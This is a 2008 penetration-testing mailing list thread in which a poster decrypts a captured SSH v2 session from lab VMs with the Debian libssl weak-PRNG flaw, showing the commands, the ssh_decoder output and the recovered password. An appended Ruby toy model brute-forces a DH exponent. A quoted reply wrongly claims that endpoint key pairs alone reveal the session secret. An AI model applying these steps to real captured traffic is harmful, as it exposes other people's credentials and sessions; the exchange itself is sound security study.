Penetration Testing mailing list archives

Re: How to decrypt a connection SSH v2?
From: Ulises2k <ulises2k () gmail com>
Date: Thu, 10 Jul 2008 17:38:07 -0300

I do.
Thanks very much to Raphaël Rigo, the developer of ssh_decoder.[0]

I have 2 virtual machines: 1 Ubuntu 8.04 server (not updated) and 1
Ubuntu 8.04 client (not updated).
The VMs have the libssl vulnerability discovered by Luciano Bello in May 2008.

Client TTY 1:
$ sudo wireshark

In another terminal (TTY2), run:
user () 192 168 230 143's password:
Last login: Wed Jul  9 17:10:04 2008 from
user () ubuntu804server:~$ echo "este es un comando tirado en el server"
user () ubuntu804server:~$ exit

Client TTY1:
Stop sniffing in Wireshark.
Save the file as "sshv2.cap".

$ tcpick -wRC -wRS -r sshv2.cap
Starting tcpick 0.2.1 at 2008-07-10 14:14 EDT
Timeout for connections is 600
tcpick: reading from sshv2.cap
1      SYN-SENT >
1      FIN-WAIT-1 >
1      TIME-WAIT >
1      CLOSED >
tcpick: done reading from sshv2.cap

81 packets captured
1 tcp sessions detected

$ ruby ssh_decoder.rb tcpick*
 * read handshake
cipher: aes128-cbc, mac: hmac-md5, kex_hash: sha256, compr: none
 * bruteforce DH
DH shared secret :
 * derive keys
 * decipher streams
 * successful authentication packet
 * deciphered streams saved to "sshdecrypt.0.client.dat" &

User: User
Password: superpassword

All the text is in sshdecrypt.0.client.dat and sshdecrypt.0.server.dat.

The scripts (ssh_decoder and ssh_kex_keygen) generate the private key.

Download ssh_decoder and ssh_kex_keygen [0]


Thank you very much.

Ulises U. Cuñé
Web: http://www.ulises2k.com.ar

On Thu, Jul 10, 2008 at 14:25, Gary E. Miller <gem () rellim com> wrote:

Yo Paul!

On Thu, 10 Jul 2008, Paul Melson wrote:

I assume if the attacker has the public and private keys from not just
one, but both ends, that PFS is not an obstacle.

It's my understanding that even if you have both endpoints' public and
private key pairs, that's not enough to recreate the ephemeral keys used
during a particular session.  Without those keys, the packet capture cannot
be decrypted.

Read the RFC and tell me that again:

       "The Diffie-Hellman (DH) key exchange provides a shared secret
       that cannot be determined by either party alone. "

The whole point of the key exchange is to use both sets of
public/private keys to generate this shared secret, and only those 4
keys.  If you possess those 4 keys then game over, you can decode the
shared key.

Looks to me that the RFC tells you all you need to know to recover
the shared secret.    If someone had some time on their hands
they could probably grab most of the needed code out of the openssh

- ---------------------------------------------------------------------------
Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701
       gem () rellim com  Tel:+1(541)382-8588
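
A toy model of the "bruteforce DH" step in the transcript above, added here as an illustration (not code from ssh_decoder or from anyone in this thread): the libssl flaw left the process ID as essentially the only PRNG entropy, so an ephemeral DH exponent came from a space of roughly 32,767 values, and a captured public value is enough to pin it down, while the host keys never enter the computation of the shared secret. The group parameters, the use of Ruby's Random as a stand-in for the flawed generator, and all function names are assumptions made for the example.

```ruby
require 'securerandom'

# Toy DH group constructed for this example (not an SSH group): p = 2^127 - 1.
P = 2**127 - 1
G = 3
PID_MAX = 32_767 # assumption: the flawed PRNG's only entropy is the process ID

# Models the flawed generator: the exponent is fully determined by the PID.
def weak_exponent(pid)
  Random.new(pid).rand(2..P - 2)
end

# Models a patched generator: exponent drawn from the OS CSPRNG.
def strong_exponent
  SecureRandom.random_number(P - 3) + 2
end

def public_value(x)
  G.pow(x, P)
end

# Given only a public value seen on the wire, test every possible PID.
# Returns the matching exponent, or nil if the PID space does not contain it.
def exponent_from_pid_space(observed)
  (1..PID_MAX).each do |pid|
    x = weak_exponent(pid)
    return x if public_value(x) == observed
  end
  nil
end

# One session: returns [client public e, server public f, shared secret K].
# No host key appears here; in SSH it only signs the exchange.
def session(client_x)
  y = strong_exponent # the server side is healthy in this model
  [public_value(client_x), public_value(y), public_value(y).pow(client_x, P)]
end

# Audit one session from the observer's view: is K derivable from e and f?
def audit(client_x)
  e, f, k = session(client_x)
  x = exponent_from_pid_space(e)
  x && f.pow(x, P) == k ? :secret_exposed : :secret_protected
end

if __FILE__ == $PROGRAM_NAME
  puts "weak client PRNG:    #{audit(weak_exponent(4242))}"
  puts "patched client PRNG: #{audit(strong_exponent)}"
end
```

One weak endpoint is enough to expose the session, which is why the remedy was to update libssl on every host and regenerate any keys created with the flawed version.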
